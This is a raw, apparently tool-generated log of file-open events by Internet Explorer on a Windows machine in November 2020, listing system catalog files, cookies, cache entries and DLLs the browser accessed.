11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~el-GR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~el-GR~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~el-GR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~uk-UA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hr-HR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hr-HR~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hr-HR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-CN~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~lt-LT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~lt-LT~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~lt-LT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-HK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-HK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-HK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~cs-CZ~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-TW~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-TW~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~zh-TW~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\ASYNC_USERSYNC[1].JS
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\VP5UL7J7.TXT
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\9LD3P0Y8.TXT
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\19O5P9C0.txt
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\19O5P9C0.txt
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imgutil.dll
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\imgutil.dll
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sk-SK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~da-DK~7.1.7601.16492.cat
11/3/2020 - 11:45:46.168Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ja-JP~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ja-JP~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ja-JP~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-BR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-BR~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-BR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.catWin8IP-Microsoft-Windows-Graphics-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~lv-LV~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~lv-LV~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~lv-LV~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ar-SA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ar-SA~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~ar-SA~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~pt-PT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sv-SE~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sv-SE~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~sv-SE~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ru-RU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ru-RU~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~ru-RU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~hu-HU~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\X0AL0GS5.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\6SGKN470.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~it-IT~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\8IS70EJY.txt
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\8IS70EJY.txt
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\QSML[2].XML
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc6.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc6.dlldhcpcsvc6.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\dhcpcsvc.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~tr-TR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~tr-TR~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~tr-TR~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_D93C575AD9E9AF9B95268A3CB953B5A1
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_D93C575AD9E9AF9B95268A3CB953B5A1B398B80134F72209547439DB21AB308D_D93C575AD9E9AF9B95268A3CB953B5A1
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\QSML[3].XML
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA4109
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA41099915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA4109
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA4109
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA41099915FBCE5ECE56452A09FB65EDE2FAD2_80F9A36DBD5FAAA38A8DED2B49FA4109
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-Windows-WinIP-Package~31bf3856ad364e35~amd64~pl-PL~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~nb-NO~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Win8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~nb-NO~7.1.7601.16492.catWin8IP-Microsoft-Windows-DownlevelApisets-WinIP-Package~31bf3856ad364e35~amd64~nb-NO~7.1.7601.16492.cat
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EHQ10TF8\QSML[6].XML
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GRO8Z4YG.txt
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\GRO8Z4YG.txt
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\D3LNK60R.txt
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\D3LNK60R.txt
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Users\Behemot\AppData\Roaming\Microsoft\Windows\Cookies\TOEJ0U6L.TXT
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.tlb
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\mshtml.tlb
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\UIAutomationCore.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\UIAutomationCore.dllUIAutomationCore.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\psapi.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\psapi.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\C_20127.NLS
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\System32\C_20127.NLS
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Wpc.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\Wpc.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wevtapi.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\wevtapi.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\samcli.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\samcli.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\samlib.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\samlib.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\netutils.dll
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\Windows\SysWOW64\netutils.dll
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\cversions.2.db
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\cversions.2.dbcversions.2.db
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000011.db
11/3/2020 - 11:45:46.184Open2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
11/3/2020 - 11:45:46.184Unknown2488C:\Program Files (x86)\Internet Explorer\iexplore.exeC:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db
